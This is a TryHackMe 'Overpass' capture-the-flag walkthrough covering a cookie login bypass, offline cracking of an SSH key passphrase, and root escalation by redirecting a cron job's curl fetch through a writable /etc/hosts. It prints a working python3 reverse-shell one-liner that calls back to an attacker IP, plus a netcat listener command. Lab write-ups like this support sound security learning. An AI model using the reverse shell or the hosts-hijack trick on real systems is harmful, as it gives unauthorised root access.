Overpass — TryHackMe: Walkthrough 🏴
What happens when some broke CompSci students make a password manager?
I created this walkthrough for documentation purposes, to make sure I remember what I’ve learned in this room. I do this for write-up and grammar practice, lol. Let’s rock and happy hacking 🤘
Room URL: https://tryhackme.com/room/overpass
Machine IP Address : 10.10.228.4
The first thing to do is port scanning, and nmap is the tool for that. The scan shows two open ports: SSH and HTTP.
SSH gives us nothing to work with without credentials, so I went to the website, and it loaded without any trouble.
I continued enumeration with gobuster, which found an /admin directory.
/admin is a login page, but neither command injection nor SQL injection got me past it.
Inspecting the page source turned up something interesting: a login() function in the page’s JavaScript, which shows what the client does after a successful login.
The check is effectively client-side: I set the same cookie the login() function creates on success, refreshed the page, and the login was bypassed. The server only checks that the cookie exists, not that it was issued by a real login.
The admin page contains a hint in the form of a “private key”, plus a username, James, which will be useful later.
I saved the private key to a file (with 600 permissions, or ssh will refuse to use it) and tried to SSH in as james with it. One problem: the key is passphrase-protected, and I didn’t know the passphrase.
The fix is to crack it offline: ssh2john converts the key into a hash that John the Ripper understands, and john with a wordlist recovered the passphrase.
I tried SSH access again with the key and the cracked passphrase, and boom… I was in.
Looking around the home directory, I found a text file named “todo” and also the first flag.
Answer:
The second flag needs root, and this user doesn’t have it. So I looked at the system crontab, and there is a job running every minute as root. How could this be exploited? The job uses curl to fetch “buildscript.sh” from overpass.thm and runs whatever it downloads. Root fetching a script over plain HTTP by hostname and executing it is the whole vulnerability: if we control where the hostname resolves, we control what root runs.
I checked /etc/hosts, and it is writable by our user, so I changed the entry for “overpass.thm” to point at my own machine. From now on the cron job’s curl talks to us.
I created a buildscript.sh containing a reverse shell, placed at the same path on my web server that the cron job requests.
# buildscript.sh: the root cron job pipes this into a shell, so a one-line python3 reverse shell to the attacker (10.9.0.54) on port 4444 is enough
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.0.54",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Set up a netcat listener on my machine on the same port as the payload (nc -lvnp 4444).
Started a local web server (on port 80 if the URL in the cron job has no explicit port, which needs root locally) and waited for the next minute. The request came in and our reverse shell was served.
Back to the netcat listener, we gained access with root privileges :) Of course, we obtained another flag in the process!
Conclusion:
Here, we have completed the overpass room.
Stay connected with me! Feel free to reach out through my social media
Linkedin : www.linkedin.com/in/jovanskiprmwsd
Tryhackme : https://tryhackme.com/p/un533nc0w
Email : jovanski.wisuda@gmail.com